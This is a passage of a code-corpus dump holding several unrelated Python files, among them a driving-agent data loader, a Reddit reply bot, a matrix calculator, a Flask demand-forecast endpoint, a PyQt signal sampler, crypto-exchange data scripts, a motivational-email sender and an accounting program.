we use the future position of the expert as gt\n for i in range(len(seq_x)):\n # waypoint is the transformed version of the origin in local coordinates\n # we use 90-theta instead of theta\n # LBC code uses 90+theta, but x is to the right and y is downwards here\n local_waypoint = transform_2d_points(np.zeros((1,3)),\n np.pi/2-seq_theta[i], -seq_x[i], -seq_y[i], np.pi/2-ego_theta-self.angle.item(), -ego_x, -ego_y)\n waypoints.append(tuple(local_waypoint[0,:2]))\n\n data['waypoints'] = waypoints\n # convert x_command, y_command to local coordinates\n # taken from LBC code (uses 90+theta instead of theta),\n # see https://github.com/dotchen/LearningByCheating\n local_command_point = []\n R = np.array([\n [np.cos(np.pi/2+ego_theta+self.angle.item()), -np.sin(np.pi/2+ego_theta+self.angle.item())],\n [np.sin(np.pi/2+ego_theta+self.angle.item()), np.cos(np.pi/2+ego_theta+self.angle.item())]\n ])\n local_command_point = np.array([self.x_command[index]-ego_x, self.y_command[index]-ego_y])\n local_command_point = R.T.dot(local_command_point)\n\n data['target_point'] = tuple(local_command_point)\n data['steer'] = self.steer[index]\n data['throttle'] = self.throttle[index]\n data['brake'] = self.brake[index]\n data['brake_seq'] = self.brake_seq[index]\n data['light'] = self.light[index]\n data['speed'] = self.speed[index]\n data['theta'] = self.theta[index]\n data['seq_x'] = seq_x\n data['seq_y'] = seq_y\n data['seq_theta'] = seq_theta\n data['seq_x_old'] = seq_x_old\n data['seq_y_old'] = seq_y_old\n data['seq_theta_old'] = seq_theta_old\n data['x_command'] = self.x_command[index]\n data['y_command'] = self.y_command[index]\n data['command'] = self.command[index]\n data['no_aug'] = no_augment\n\n data['y_offset'] = self.offsets['y_offset']\n data['x_offset_pos'] = self.offsets['x_offset_pos']\n data['x_offset_neg'] = self.offsets['x_offset_neg']\n data['target_im_size'] = self.target_im_size\n data['aug_max_rotation'] = self.aug_max_rotation\n data['bev'] = data['bev'][0] # we just use a single frame\n data = augment_all(data, channels=4)\n\n return data\n\n\ndef load_crop_bev_png(filename, do_augment, offsets, target_im_size, bev_type):\n \"\"\"\n Load and crop an Image.\n Crop depends on augmentation angle.\n \"\"\"\n if do_augment == 0:\n offsets=None\n\n # load png image\n image = Image.open(filename)\n bev_array = 
np.array(image)\n bev_array = np.moveaxis(bev_array, 2, 0)\n\n if bev_type == 'Encoded_cropped' or bev_type=='Org_cropped':\n cropped_image = crop_bev(bev_array, target_im_size, offsets)\n else:\n cropped_image = bev_array\n\n return cropped_image\n\ndef crop_bev(array, target_im_size, offsets=None):\n if offsets is not None:\n y_offset = offsets['y_offset']\n x_offset_pos = offsets['x_offset_pos']\n x_offset_neg = offsets['x_offset_neg']\n PIXELS_AHEAD_VEHICLE = 96 + PIXEL_SHIFT\n else:\n y_offset = 0\n x_offset_pos = 0\n x_offset_neg = 0\n if array.shape[1] == target_im_size[0]:\n PIXELS_AHEAD_VEHICLE = 0\n else:\n PIXELS_AHEAD_VEHICLE = 96 + PIXEL_SHIFT\n\n\n (width, height) = (array.shape[1], array.shape[2])\n crop_x = int(target_im_size[0]) + x_offset_neg + x_offset_pos\n crop_y = int(target_im_size[1]) + y_offset * 2\n\n start_x = height//2 - target_im_size[0]//2 # this would be central crop\n start_x = start_x - PIXELS_AHEAD_VEHICLE # this would be the 'normal' shifted crop\n start_x = start_x - x_offset_pos # bigger crop for augmentation\n start_y = width//2 - target_im_size[1]//2 - y_offset\n cropped_image = array[:, start_x:start_x+crop_x, start_y:start_y+crop_y]\n return cropped_image","repo_name":"autonomousvision/king","sub_path":"driving_agents/king/aim_bev/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":15426,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"52"} +{"seq_id":"30181814647","text":"import praw\nimport re\nimport os\nimport sys\n\n\nclass HelloBot:\n \"\"\"\n A reddit bot that scans the 5 hottest submissions in a subreddit and\n replies to all posts containing the string 'hello world' with\n 'Hello there!'.\n \"\"\"\n def __init__(self):\n \"\"\"\n Initialize Hello bot, loading in its list of posts to ignore and\n preparing an instance of praw.Reddit\n \"\"\"\n self._reddit = praw.Reddit('hello_bot')\n\n # Initialize or load a list containing the posts Hellobot should ignore\n if not os.path.isfile('posts_replied_to.txt'):\n self._posts_replied_to = []\n else:\n with open('posts_replied_to.txt', 'r') as f:\n post_string = f.read()\n self._posts_replied_to = post_string.split(\"\\n\")\n self._posts_replied_to = \\\n list(filter(None, self._posts_replied_to))\n\n def _update_replied_to(self):\n \"\"\" Update the file list of posts hellobot has replied to \"\"\"\n with open('posts_replied_to.txt', 'w') as f:\n for post_id in self._posts_replied_to:\n f.write(post_id + '\\n')\n\n def _reply_to_post(self, post):\n \"\"\"\n First, check to see if the post is a comment or submission, then\n reply if its text contains 'hello world' and hellobot hasn't\n already replied!\n\n :param post: The post that hellobot will parse and maybe reply to\n :type post: praw.Submission || praw.Comment\n \"\"\"\n\n if isinstance(post, praw.models.Submission):\n post_text = post.selftext\n else:\n post_text = post.body\n\n if post.id not in self._posts_replied_to and \\\n re.search('hello world', post_text, re.IGNORECASE):\n\n post.reply('Hello there, /u/%s!' 
% post.author.name)\n self._posts_replied_to.append(post.id)\n\n def _check_comment_tree(self, submission):\n \"\"\"\n Iterate over a submission's comment tree, replying to each\n applicable comment.\n\n :param submission: The comment tree to iterate over\n :type submission: praw.Submission\n \"\"\"\n # Get rid of 'uncollapsed' comments\n submission.comments.replace_more(limit=0)\n\n comment_queue = submission.comments[:]\n while comment_queue:\n comment = comment_queue.pop(0)\n comment_queue.extend(comment.replies)\n\n self._reply_to_post(comment)\n\n def say_hello(self, subreddit):\n \"\"\"\n Iterate through the 5 hottest submissions in a given subreddit\n and have hellobot say hello to any posts (comments OR submissions)\n containing the string 'hello world'.\n\n :param subreddit: The subreddit to check\n :type subreddit: str\n \"\"\"\n for submission in self._reddit.subreddit(subreddit).hot(limit=5):\n self._reply_to_post(submission)\n self._check_comment_tree(submission)\n self._update_replied_to()\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 2:\n subreddit = sys.argv[1]\n else:\n print(\"Invalid arguments given; defaulting to subreddit r/neeerp\")\n subreddit = 'neeerp'\n\n hello_bot = HelloBot()\n hello_bot.say_hello(subreddit)\n","repo_name":"neeerp/HelloBot","sub_path":"hello_bot.py","file_name":"hello_bot.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23272485175","text":"class Matrix:\n def __init__(self, size=None, n=\"\"):\n self.ok = True\n if size:\n (self.rows, self.columns) = size\n else:\n rows, columns = input(\"Enter size of \" + n + \"matrix:\").split()\n self.rows, self.columns = int(rows), int(columns)\n self.size = (self.rows, self.columns)\n print(\"Enter \" + n + \"matrix\")\n self.elements = [[num(e) for e in input().split()] for _ in range(self.rows)]\n\n def column(self, i):\n return list([self.elements[j][i] for j in range(self.rows)])\n\n def __str__(self):\n if not self.ok:\n return \"The operation cannot be performed.\"\n return \"The result is:\\n\" + \"\\n\".join([' '.join([f\"{round(x, 3):>7}\"\n for x in row]) for row in self.elements])\n\n def const_multi(self, const):\n self.elements = [[const * e for e in row] for row in self.elements]\n return self\n\n def add(self, add_m):\n if self.size == add_m.size:\n for r in range(self.rows):\n for c in range(self.columns):\n self.elements[r][c] += add_m.elements[r][c]\n return self\n else:\n self.ok = False\n\n def multiply(self, mult_m):\n if self.columns == mult_m.rows:\n tmp = []\n for r in range(self.rows):\n row = []\n for c in range(mult_m.columns):\n row.append(sum(map(lambda x, y: x * y, self.elements[r], mult_m.column(c))))\n tmp.append(row)\n self.elements = tmp\n return self\n else:\n self.ok = False\n\n def transp_main(self):\n self.elements = [[x for x in self.column(i)] for i in range(self.columns)]\n return self\n\n def transp_side(self):\n self.elements = [[x for x in reversed(self.column(i - 1))] for i in range(self.columns, 0, -1)]\n return self\n\n def transp_vertical(self):\n self.elements = [reversed(row) for row in self.elements]\n return self\n\n def transp_horisontal(self):\n self.elements = [row for row in reversed(self.elements)]\n return self\n\n def minor(self, row, column):\n m_minor = Matrix(size=(self.rows - 1, self.columns - 1))\n m_minor.elements = [self.elements[r][:column] + self.elements[r][column + 1:]\n for r in range(len(self.elements)) if r != row]\n 
return m_minor\n\n def cofactor(self, row, column):\n return (-1) ** (row + column) * self.minor(row, column).determinant()\n\n def determinant(self):\n if self.rows == self.columns:\n if len(self.elements) == 1:\n return self.elements[0][0]\n return sum(map(lambda i: self.elements[0][i] * self.cofactor(0, i), [i for i in range(self.rows)]))\n else:\n self.ok = False\n\n def inverse(self):\n if self.rows == self.columns and self.determinant():\n d = self.determinant()\n self.elements = [[self.cofactor(r, c) for c in range(self.columns)] for r in range(self.rows)]\n self.transp_main().const_multi(1 / d)\n return self\n else:\n self.ok = False\n\n\ndef num(s):\n try:\n return int(s)\n except ValueError:\n return float(s)\n\n\nwhile True:\n print('1. Add matrices\\n2. Multiply matrix by a constant\\n'\n '3. Multiply matrices\\n4. Transpose matrix\\n'\n '5. Calculate a determinant\\n6. Inverse matrix\\n0. Exit')\n choice = int(input(\"Your choice: \"))\n\n if choice == 0:\n break\n elif choice == 1:\n print(Matrix(n=\"first \").add(Matrix(n=\"second \")))\n elif choice == 2:\n print(Matrix().const_multi(int(input(\"Enter constant:\"))))\n elif choice == 3:\n print(Matrix(n=\"first \").multiply(Matrix(n=\"second \")))\n elif choice == 4:\n print('1. Main diagonal\\n2. Side diagonal\\n'\n '3. Vertical line\\n4. Horizontal line\\n0. Exit')\n choice = int(input(\"Your choice: \"))\n if choice == 1:\n print(Matrix().transp_main())\n elif choice == 2:\n print(Matrix().transp_side())\n elif choice == 3:\n print(Matrix().transp_vertical())\n else:\n print(Matrix().transp_horisontal())\n elif choice == 5:\n print(f\"The result is:\\n{Matrix().determinant()}\")\n elif choice == 6:\n print(Matrix().inverse())\n print()\n","repo_name":"py-cs/matrices","sub_path":"processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16814007602","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def getIntersectionNode(self, headA, headB):\n \"\"\"\n :type head1, head1: ListNode\n :rtype: ListNode\n \"\"\"\n if not headA or not headB:\n return None\n\n hA = headA\n while hA.next:\n hA = hA.next\n\n tail = hA\n tail.next = headA\n\n intersection = None\n hb1 = headB\n hb2 = headB\n\n while hb1 and hb2:\n hb1 = hb1.next\n hb2 = hb2.next\n if hb2:\n hb2 = hb2.next\n if hb1 == hb2:\n break\n\n if hb1 and hb2 and hb1 == hb2:\n hb1 = headB\n while hb1 != hb2:\n hb1 = hb1.next\n hb2 = hb2.next\n\n intersection = hb1\n\n tail.next = None\n\n return intersection\n\n\nif __name__ == \"__main__\":\n s = Solution()\n","repo_name":"vishwakt/A-Problem-A-Day","sub_path":"160_intersection_of_two_linked_lists.py","file_name":"160_intersection_of_two_linked_lists.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33745115084","text":"import flask\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom flask import request, send_file\n\ncsv = r'Historical Product Demand.csv'\ndf = pd.read_csv(csv)\n# df.head(10)\n\napp = flask.Flask(__name__)\n\n@app.route('/demand', methods=['POST'])\ndef getDemand():\n req = request.get_json(force=True)\n cat = req['category']\n groupByCategory = 
df.groupby(['Product_Category']).size().reset_index(name='counts').sort_values(['counts'],ascending=False)\n    # groupByCategory.head(10)\n\n    categoryDf = df.loc[df['Product_Category'] == cat].sort_values(['Date'],ascending=False)\n    categoryDf = categoryDf.drop(columns=['Warehouse','Product_Code','Product_Category'])\n    # categoryDf.describe()\n\n    categoryDf.index=pd.to_datetime(categoryDf.Date,format='%Y/%m/%d')\n    categoryDf.drop(columns=['Date'],inplace=True)\n    categoryDf['Order_Demand'] = categoryDf['Order_Demand'].astype(str)\n    categoryDf['Order_Demand'] = categoryDf['Order_Demand'].map(lambda x: x.lstrip('(').rstrip(')'))\n    categoryDf['Order_Demand'] = categoryDf['Order_Demand'].astype(int)\n\n    categoryDemand = categoryDf.resample('M').sum()\n    # categoryDemand.head(10)\n\n    # categoryDemand.drop(categoryDemand.loc[categoryDemand['Order_Demand']==100000].index,inplace=True)\n    # categoryDemand.Order_Demand.plot(figsize=(13,6), title= 'Product 1359 Demand', fontsize=14,color=\"Green\")\n\n    train = categoryDemand[:'2016-03-31']\n    test = categoryDemand['2016-04-30':]\n\n    # train.Order_Demand.plot(figsize=(13,6), title= 'Product 1359 - Train and Test', fontsize=12,color=\"Green\")\n    # test.Order_Demand.plot(figsize=(13,6), title= 'Product 1359 - Train and Test', fontsize=12)\n\n    from statsmodels.tsa.api import SimpleExpSmoothing\n    y_hat_avg = test.copy()\n    fit2 = SimpleExpSmoothing(np.asarray(train['Order_Demand'])).fit(smoothing_level=0.6,optimized=False)\n    y_hat_avg['SES'] = fit2.forecast(len(test))\n    plt.figure(figsize=(14,6))\n    plt.plot(train['Order_Demand'], label='Train',color=\"Green\")\n    plt.plot(test['Order_Demand'], label='Test')\n    plt.plot(y_hat_avg['SES'], label='SES',color=\"Red\")\n    plt.title(\"Simple Smoothing\")\n    plt.legend(loc='best')\n\n    # # Exponential Smoothing\n\n    # exp_hat_avg = test.copy()\n    # fit1 = ExponentialSmoothing(np.asarray(train['Order_Demand']) ,seasonal_periods=4 ,trend='additive', seasonal='additive',).fit()\n    # exp_hat_avg['Exp_Smooth'] = fit1.forecast(len(test))\n    # plt.figure(figsize=(14,6))\n    # plt.plot( train['Order_Demand'], label='Train',color=\"Green\")\n    # plt.plot(test['Order_Demand'], label='Test')\n    # plt.plot(exp_hat_avg['Exp_Smooth'], label='Exp_Smooth',color=\"Red\")\n    # plt.legend(loc='best')\n    # plt.title(\"Exponential Smoothing\")\n    plt.savefig('demand.png')\n    plt.show()\n\n    # send the saved figure back to the client; send_file expects a path or a\n    # file-like object (not a numpy array), and the file written above is a PNG\n    return send_file('demand.png', mimetype='image/png')\n\nif __name__ == '__main__':\n    app.run(port=5000, debug=True)","repo_name":"tsuresh/Jansss","sub_path":"datascience/wip/demandPrediction.py","file_name":"demandPrediction.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15723002781","text":"import numpy as np\nimport pandas as pd\nfrom PyQt5 import QtWidgets\nfrom PyQt5 import QtCore as qtc\nfrom PyQt5 import uic\nfrom PyQt5.QtWidgets import QFileDialog\nfrom scipy import signal\n\nfrom Sampling_and_reconstruction_canvas import Sampling_and_reconstruction_canvas\nfrom Fourier_package import get_f_max\n\nclass Sampler(QtWidgets.QWidget):\n\n    def __init__(self):\n        super().__init__()\n        uic.loadUi(\"UI/Sampler.ui\", self)\n        self.sampel_and_reco_canvas =Sampling_and_reconstruction_canvas()\n        self.Canvas_layout.addWidget(self.sampel_and_reco_canvas )\n\n        self.time=[]\n        self.values=[]\n        self.max_freq=0\n        self.Freq_rate_slider.setValue(10)\n        
self.Freq_rate_slider.valueChanged.connect(self.sample_signal)\n self.toggel_button.clicked.connect(self.toggel_visability_second_axes)\n self.CSV_load_button.clicked.connect(self.load_external_signal)\n\n def clear_canvas(self):\n self.sampel_and_reco_canvas.clear_canvas()\n\n def init_canvas(self):\n self.clear_canvas()\n self.sample_signal()\n\n def move_to_sampler(self,time,values,max_freq):\n self.load_composed_signal(time,values,max_freq)\n self.plot_composed_signal()\n\n\n def load_composed_signal(self,time,values,max_freq):\n self.time=time\n self.values=values\n self.max_freq=max_freq\n self.Lcd_max_freq.display(max_freq)\n\n def plot_composed_signal(self):\n self.sampel_and_reco_canvas.plot_composed_signal(self.time,self.values)\n\n\n def sample_signal(self):\n values = np.array(self.values)\n # print(\"inside sample\")\n\n factor = (self.Freq_rate_slider.value()/10)\n self.Slider_lable.setText(\"{F_max}F-max\".format(F_max = factor))\n sampling_freq =factor*self.max_freq\n # print(\"sampling_freq sample\")\n sampled_time_points = np.arange(self.time[0],self.time[-1],1/sampling_freq)\n\n # print((self.values))\n sampled_values_points= values[np.searchsorted(self.time,sampled_time_points)]\n\n reconstructed_signal = self.reconstruct_signal(sampled_values_points,len(self.time))\n\n self.clear_canvas()\n self.plot_composed_signal()\n self.plot_reconstructed_signal(self.time,sampled_time_points,sampled_values_points,reconstructed_signal)\n\n\n def reconstruct_signal(self,sampled_values_points,num_points):\n reconstructed_signal = signal.resample(sampled_values_points, num_points)\n return reconstructed_signal\n\n\n\n def plot_reconstructed_signal(self,time,sampled_time_points,sampled_values_points,reconstructed_signal):\n self.sampel_and_reco_canvas.plot_reconstructed_signal(self.time,reconstructed_signal)\n self.sampel_and_reco_canvas.plot_sampled_scatterd_signal(sampled_time_points,sampled_values_points)\n self.sampel_and_reco_canvas.plot_final_reconstructed_signal(self.time,reconstructed_signal)\n\n def toggel_visability_second_axes(self):\n # print(\"iiiiiiiiiiiiiiiii\")\n self.sampel_and_reco_canvas.toggel_visability_second_axes()\n\n\n\n def load_external_signal(self):\n time , values =self.Load_csv_file()\n self.time=time.values\n self.values=values.values\n # print(self.values)\n self.max_freq = self.get_f_max_from_external_signal(time , values)\n self.Lcd_max_freq.display(self.max_freq)\n self.init_canvas()\n self.plot_external_signal()\n\n def Load_csv_file(self):\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n fileName, _ = QFileDialog.getOpenFileName(self, \"Choose File\", \"\", \"csv (*.csv)\",\n options=options)\n df = pd.read_csv(fileName)\n time = df.iloc[:, 0]\n values = df.iloc[:, 1]\n return time , values\n\n def get_f_max_from_external_signal(self,time,data):\n max_freq=get_f_max(time,data)\n return max_freq\n\n def plot_external_signal(self):\n self.sampel_and_reco_canvas.plot_composed_signal(self.time,self.values)","repo_name":"saied-salem/Sampling-and-Reconstruction-Studio","sub_path":"src/Sampler.py","file_name":"Sampler.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16869852090","text":"import Settings\nimport json, base64, hashlib, urlparse, hmac, time, websocket, thread, copy\nfrom websocket import create_connection\nfrom coincheck import *\n\nbids = []\nasks = []\n\ncoincheckapi.get_orderbook()\n\nraise 
SystemExit\n\ndef on_message(ws, message):\n global bids, asks\n message = json.loads(message)\n \n print(message[1]['bids'])\n \n\ndef on_error(ws, error):\n print(error)\n\ndef on_close(ws):\n print('Connection closed')\n\ndef on_open(ws):\n request = {\"type\": \"subscribe\", \"channel\": \"btc_jpy-orderbook\"}\n ws.send(json.dumps(request))\n print('Requested orderbook updates')\n\nwebsocket.enableTrace(True)\nws = websocket.WebSocketApp(Settings.url,\n on_message = on_message,\n on_error = on_error,\n on_close = on_close\n)\nws.on_open = on_open\nws.run_forever()","repo_name":"hale0124/CoinCheck-Sniper","sub_path":"machine.py","file_name":"machine.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"15321791975","text":"from pydruid.utils.filters import Filter\n\nfrom config.druid_base import FIELD_NAME\nfrom db.druid.calculations.base_calculation import BaseCalculation\nfrom db.druid.calculations.simple_calculation import SumCalculation\n\n# Optimize a composite calculation that would normally sum multiple child fields\n# using a post aggregator into a single SumCalculation that can calculate those\n# child fields directly in a single aggregation. If the calculation cannot be\n# optimized, return None.\ndef optimize_composite_calculation(composite_id, children_calculation, child_fields):\n # Cannot optimize if there are post aggregations combining multiple fields.\n if children_calculation.post_aggregations:\n return None\n\n filter_fields = set()\n aggregations = children_calculation.aggregations\n for field in child_fields:\n field_agg = aggregations.get(field)\n\n # If an aggregation is missing for this field (this should never happen)\n # or the aggregator is not a dictionary (implies it is a more complex\n # type), then we cannot optimize.\n if not field_agg or not isinstance(field_agg, dict):\n return None\n\n # All child fields should be filtered sum calculations where the filter\n # limits the aggregator to just the fields needed to compute the child\n # field.\n if (\n field_agg['type'] != 'filtered'\n or field_agg['aggregator']['type'] != 'doubleSum'\n ):\n return None\n\n # Only can optimize simple dimension filters (like selector or in) that\n # filter over the field dimension.\n agg_filter = field_agg['filter']\n if agg_filter.get('dimension') != FIELD_NAME:\n return None\n\n filter_type = agg_filter['type']\n if filter_type == 'selector':\n filter_fields.add(agg_filter['value'])\n elif filter_type == 'in':\n filter_fields.update(agg_filter['values'])\n else:\n return None\n\n composite_filter = (\n Filter(dimension=FIELD_NAME, value=filter_fields.pop())\n if len(filter_fields) == 1\n else Filter(type='in', dimension=FIELD_NAME, values=sorted(filter_fields))\n )\n\n return SumCalculation.create_with_filter(\n field=composite_id, agg_filter=composite_filter\n )\n\n\ndef build_composite_indicator_calculation(\n composite_id, children_calculation, child_fields\n):\n '''Create a full calculation for the composite indicator that combines the\n child field calculations into a single calculation.\n\n Args:\n composite_id: The composite indicator ID the final value will be stored\n under.\n children_calculation: A Calculation object (deriving from\n BaseCalculation) that has all aggregations/post aggregations built\n for the child fields.\n child_fields: The list of child fields this composite indicator is\n combining.\n '''\n optimized_calculation = 
optimize_composite_calculation(\n composite_id, children_calculation, child_fields\n )\n if optimized_calculation:\n return optimized_calculation\n\n # Clone the calculation so we do not modify it in place.\n full_calculation = BaseCalculation(\n aggregations=children_calculation.aggregations,\n post_aggregations=children_calculation.post_aggregations,\n strict_null_fields=children_calculation.strict_null_fields,\n )\n formula = ' + '.join(child_fields)\n full_calculation.add_post_aggregation_from_formula(composite_id, formula)\n return full_calculation\n","repo_name":"Zenysis/Harmony","sub_path":"data/composite_indicator/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"52"} +{"seq_id":"28480811984","text":"\"\"\"\r\nI developed this project to help my girlfriend by sending motivational messages every hour. You can use it for your partner as well :)\r\n\r\n\"\"\"\r\n\r\n\r\nimport random\r\nimport time\r\nimport requests\r\nimport json\r\n\r\n# SendGrid API key\r\nsendgrid_api_key = 'privatesnedgridapikey'\r\n\r\n# List of motivacional messages \r\nmensajes_motivacionales = [\r\n 'No te rindas, todo esfuerzo tiene su recompensa.',\r\n 'El éxito no es la clave de la felicidad. La felicidad es la clave del éxito.',\r\n 'Sólo se vive una vez, pero si lo haces bien, una vez es suficiente.',\r\n 'No tengas miedo de renunciar a lo bueno para perseguir lo grandioso.',\r\n 'La felicidad no es algo hecho. Viene de tus propias acciones.',\r\n 'Si puedes soñarlo, puedes lograrlo.',\r\n 'No esperes oportunidades, créalas.',\r\n 'No te preocupes por los fracasos, preocúpate por las oportunidades que pierdes al no intentarlo.',\r\n 'El éxito es la suma de pequeños esfuerzos repetidos día tras día.',\r\n 'Nunca es tarde para ser lo que podrías haber sido.'\r\n]\r\n\r\n# Function to randomnly send messages using Sendgrid API through email\r\ndef enviar_mensaje():\r\n mensaje = random.choice(mensajes_motivacionales)\r\n destino = 'receiverEmail'\r\n asunto = 'Mensaje motivacional del día'\r\n cuerpo = f'Hola,\\n\\n{mensaje}\\n\\nSaludos,\\npara recordarte que tu puedes'\r\n \r\n data = {\r\n \"personalizations\": [\r\n {\r\n \"to\": [\r\n {\r\n \"email\": destino\r\n }\r\n ],\r\n \"subject\": asunto\r\n }\r\n ],\r\n \"from\": {\r\n \"email\": \"Sender email\"\r\n },\r\n \"content\": [\r\n {\r\n \"type\": \"text/plain\",\r\n \"value\": cuerpo\r\n }\r\n ]\r\n }\r\n \r\n headers = {\r\n 'Authorization': f'Bearer {sendgrid_api_key}',\r\n 'Content-Type': 'application/json'\r\n }\r\n\r\n response = requests.post('https://api.sendgrid.com/v3/mail/send', data=json.dumps(data), headers=headers)\r\n print(response.status_code)\r\n\r\n# Send message every hour \r\nfor i in range(10):\r\n enviar_mensaje()\r\n time.sleep(3600) ","repo_name":"nicogacia2509/MessagesPartner","sub_path":"mensajesNari.py","file_name":"mensajesNari.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18582510524","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n# with open('account.txt','w',encoding='utf8') as f:\n# f.write('结算日期\t资产/w\t负债/w\t净资产/w')\n#\n# with open('recording.txt','w',encoding='utf8') as f:\n# f.write('交易对象\t收入/w\t支出/w\t应收账款/w\t应出账款/w\t交易日期')\n\nimport datetime\n\ntoday = datetime.date.today()\n\n\ndef input_d(prompt):\n while True:\n d = input(prompt)\n if d.isdigit():\n return d\n else:\n 
print('输入有误,请输入数字.')\n\n\ndef input_s(prompt):\n while True:\n d = input(prompt)\n if d.isalnum():\n return d\n else:\n print('输入有误,请输入数字或字母.')\n\n\ndef select_assets():\n day, asset, liability, net_asset = '0', '0', '0', '0'\n with open('account.txt', 'r', encoding='utf8') as f_1:\n lines = f_1.readlines()\n if len(lines) > 1:\n new_assets = lines[len(lines) - 1]\n assets_list = new_assets.split()\n day = assets_list[0]\n asset = assets_list[1]\n liability = assets_list[2]\n net_asset = assets_list[3]\n\n return day, asset, liability, net_asset\n\n\ndef show_assets():\n day, asset, liability, net_asset = select_assets()\n print('最新资产:%s 万\\n最新负债:%s 万\\n最新净资产:%s 万\\n最后更新日期:%s\\n'\n % (asset, liability, net_asset, day))\n\n\ndef recording():\n day, assets, liability, net_asset = select_assets()\n deal_op = input_s(\"交易对象:\")\n income_n = input_d(\"收入/万:\")\n expend_n = input_d(\"支出/万:\")\n receivable_n = input_d(\"应收账款/万:\")\n payable_n = input_d(\"应出账款/万:\")\n assets = int(assets) + int(income_n) - int(expend_n) # 资产=资产+收入-支出\n liability = int(liability) + int(payable_n) - int(receivable_n) # 负债=负债+应出账款-应收账款\n net_asset = assets - liability\n records = '\\n' + deal_op + '\\t' + income_n + '\\t' + expend_n + '\\t' + receivable_n + '\\t' + payable_n + '\\t' + str(\n today)\n accounts = '\\n' + str(today) + '\\t' + str(assets) + '\\t' + str(liability) + '\\t' + str(net_asset)\n with open('recording.txt', 'a', encoding='utf8') as f_w:\n f_w.write(records)\n with open('account.txt', 'a', encoding='utf8') as f_w1:\n f_w1.write(accounts)\n print('记账成功!')\n show_assets()\n\n\n# 最近10条交易记录\ndef last_ten():\n result = []\n with open('recording.txt', 'r', encoding='utf8') as f:\n lines = f.readlines()\n lines_len = len(lines)\n # print(lines[1:lines_len])\n if 1 < lines_len < 11:\n result = lines[1:lines_len]\n print('总记录不满十条...')\n elif lines_len >= 11:\n result = lines[-10:]\n else:\n print('----查询无记录-----')\n return\n print('交易对象\t收入\t支出\t应收账款\t应出账款\t交易日期')\n for i in result:\n print(i.replace('\\n', ''))\n\n\ndef read_all_records():\n with open('recording.txt', 'r', encoding='utf8') as f:\n lines = f.readlines()\n return lines\n\n\n# 与某公司的交易往来\ndef deal_with_key(key):\n key_result = []\n all_records = read_all_records()\n for i in all_records:\n if i.find(key) >= 0:\n key_result.append(i)\n if len(key_result) == 0:\n print('----查询无记录----')\n return\n print('交易对象\t收入\t支出\t应收账款\t应出账款\t交易日期')\n for i in key_result:\n print(i.replace('\\n', ''))\n\n\ndef sub_select(flag):\n if flag_2 == '1':\n key = input_s(\"请输入公司名称:\")\n deal_with_key(key)\n elif flag_2 == '2':\n last_ten()\n else:\n show_assets()\n\n\ndef go_or_stop():\n if input('按任意键继续,按Q结束').lower() == 'q':\n print('谢谢使用!再见')\n return False\n else:\n print('欢迎继续使用')\n return True\n\n\ngo_flag = True\nwhile go_flag:\n print(\"1.查账;2.记账\")\n flag_1 = input_d(\"请选择服务:\")\n if flag_1 == '2':\n recording()\n go_flag = go_or_stop()\n else:\n print('1.查询与某公司的贸易往来\\n2.查询最近十笔交易记录\\n3.查询最新资产负债情况')\n flag_2 = input_d(\"请选择:\")\n sub_select(flag_2)\n go_flag = go_or_stop()\n","repo_name":"leledada/LearnPython","sub_path":"account_program/accounting_program.py","file_name":"accounting_program.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"70576974246","text":"import requests\nimport time\nimport csv\nimport sys\nfrom datetime import datetime\n\nBASE_URL = \"https://api.binance.com/api/v3/aggTrades\"\n\ndef log_message(message, log_file):\n \"\"\"Write 
a message to the log file and print it to the console.\"\"\"\n timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n with open(log_file, 'a') as log:\n log.write(f\"{timestamp} - {message}\\n\")\n print(f\"{timestamp} - {message}\")\n\ndef date_to_epoch(date_str):\n \"\"\"Convert a date string (YYYY-MM-DD) to epoch timestamp in milliseconds.\"\"\"\n dt = datetime.strptime(date_str, '%Y-%m-%d')\n return int(dt.timestamp() * 1000)\n\ndef fetch_binance_data(symbol, startTime, endTime, log_file_name, limit=1000):\n all_trades = []\n last_trade_timestamp = 0\n\n while True:\n params = {\n \"symbol\": symbol,\n \"startTime\": max(startTime, last_trade_timestamp + 1),\n \"endTime\": endTime,\n \"limit\": limit\n }\n\n response = requests.get(BASE_URL, params=params)\n \n if response.status_code == 200:\n trades = response.json()\n if isinstance(trades, dict) and \"code\" in trades and \"msg\" in trades:\n log_message(f\"Error fetching data: {trades['msg']}\", log_file_name)\n return all_trades\n valid_trades = [trade for trade in trades if not (trade[\"p\"] == '0' and trade[\"q\"] == '0' and trade[\"f\"] == -1 and trade[\"l\"] == -1)]\n log_message(f\"Fetched {len(valid_trades)} records for the interval {params['startTime']} to {params['endTime']}.\", log_file_name)\n all_trades.extend(valid_trades)\n\n if len(valid_trades) < limit:\n break\n else:\n 